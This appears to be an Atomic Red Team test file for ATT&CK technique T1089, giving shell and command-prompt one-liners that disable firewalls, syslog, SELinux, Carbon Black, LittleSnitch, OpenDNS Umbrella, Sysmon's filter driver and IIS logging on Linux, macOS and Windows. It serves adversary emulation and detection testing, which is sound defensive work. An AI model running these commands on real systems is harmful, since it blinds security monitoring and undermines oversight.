T1089.md

T1089 - Disabling Security Tools

Description from ATT&CK

Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.

Atomic Tests

• Atomic Test #1 - Disable iptables firewall

• Atomic Test #2 - Disable syslog

• Atomic Test #3 - Disable Cb Response

• Atomic Test #4 - Disable SELinux

• Atomic Test #5 - Disable Carbon Black Response

• Atomic Test #6 - Disable LittleSnitch

• Atomic Test #7 - Disable OpenDNS Umbrella

• Atomic Test #8 - Unload Sysmon Filter Driver

• Atomic Test #9 - Disable Windows IIS HTTP Logging

Atomic Test #1 - Disable iptables firewall

Disables the iptables firewall

Supported Platforms: Linux

Run it with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service iptables stop
  chkconfig off iptables
  service ip6tables stop
  chkconfig off ip6tables
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop firewalld
  systemctl disable firewalld
fi

Atomic Test #2 - Disable syslog

Disables syslog collection

Supported Platforms: Linux

Run it with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service rsyslog stop
  chkconfig off rsyslog
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop rsyslog
  systemctl disable rsyslog
fi

Atomic Test #3 - Disable Cb Response

Disable the Cb Response service

Supported Platforms: Linux

Run it with sh!

if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "6" ];
then
  service cbdaemon stop
  chkconfig off cbdaemon
else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ];
  systemctl stop cbdaemon
  systemctl disable cbdaemon
fi

Atomic Test #4 - Disable SELinux

Disables SELinux enforcement

Supported Platforms: Linux

Run it with sh!

setenforce 0

Atomic Test #5 - Disable Carbon Black Response

Disables Carbon Black Response

Supported Platforms: macOS

Run it with sh!

sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist

Atomic Test #6 - Disable LittleSnitch

Disables LittleSnitch

Supported Platforms: macOS

Run it with sh!

sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist

Atomic Test #7 - Disable OpenDNS Umbrella

Disables OpenDNS Umbrella

Supported Platforms: macOS

Run it with sh!

sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist

Atomic Test #8 - Unload Sysmon Filter Driver

Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service.

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
sysmon_driver	The name of the Sysmon filter driver (this can change from the default)	string	SysmonDrv

Run it with command_prompt!

fltmc.exe unload #{sysmon_driver}

Atomic Test #9 - Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked.

Supported Platforms: Windows

Inputs

Name	Description	Type	Default Value
website_name	The name of the website on a server	string	Default Web Site

Run it with command_prompt!

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true